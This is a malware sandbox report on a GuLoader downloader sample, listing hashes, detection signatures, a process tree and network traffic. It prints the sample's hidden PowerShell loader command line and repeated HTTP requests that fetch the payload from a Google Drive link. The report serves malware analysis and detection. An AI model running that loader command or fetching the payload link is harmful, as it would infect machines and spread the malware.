Windows Analysis Report
You7ynHizy.exe

Overview

General Information

Sample name: You7ynHizy.exe (renamed because original name is a hash value)
Original sample name: a2091538aaa8d84e6a73bee323daa339c64d4cb13d857a05742445f65fc66013.exe
Analysis ID: 1587590
MD5: 98e8e7c349cbb65b53681757dc2959ae
SHA1: 8fbb5f9c2a9e524c39ab6269a083353a898d5b57
SHA256: a2091538aaa8d84e6a73bee323daa339c64d4cb13d857a05742445f65fc66013
Tags: exe, user-adrian__luca
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • You7ynHizy.exe (PID: 2100 cmdline: "C:\Users\user\Desktop\You7ynHizy.exe" MD5: 98E8E7C349CBB65B53681757DC2959AE)
    • powershell.exe (PID: 5036 cmdline: "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5692 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2532691410.0000000009A59000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000008.00000002.3375229817.0000000004F19000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      System Summary

      Source: Network Connection, Author: frack113, Data: DestinationIp: 142.250.185.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5692, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49917
      Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5036, TargetFilename: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)", CommandLine: "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\You7ynHizy.exe", ParentImage: C:\Users\user\Desktop\You7ynHizy.exe, ParentProcessId: 2100, ParentProcessName: You7ynHizy.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)", ProcessId: 5036, ProcessName: powershell.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2025-01-10T15:16:58.717092+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49917 | 142.250.185.110 | 443 | TCP

      AV Detection

      Source: You7ynHizy.exe, Avira: detected
      Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe, Avira: detection malicious, Label: TR/Injector.ljese
      Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exe, ReversingLabs: Detection: 65%
      Source: You7ynHizy.exe, Virustotal: Detection: 65%
      Source: You7ynHizy.exe, ReversingLabs: Detection: 65%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
      Source: You7ynHizy.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: You7ynHizy.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2522365385.00000000081C3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb7 source: powershell.exe, 00000002.00000002.2511053317.0000000002BC9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2516957835.0000000007092000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2516957835.0000000007092000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\You7ynHizy.exe, Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\You7ynHizy.exe, Code function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
      Source: C:\Users\user\Desktop\You7ynHizy.exe, Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49917 -> 142.250.185.110:443
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Host: drive.google.com, Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Cache-Control: no-cache, Host: drive.usercontent.google.com, Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Host: drive.google.com, Cache-Control: no-cache, Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global traffic, HTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Cache-Control: no-cache, Host: drive.usercontent.google.com, Connection: Keep-Alive, Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
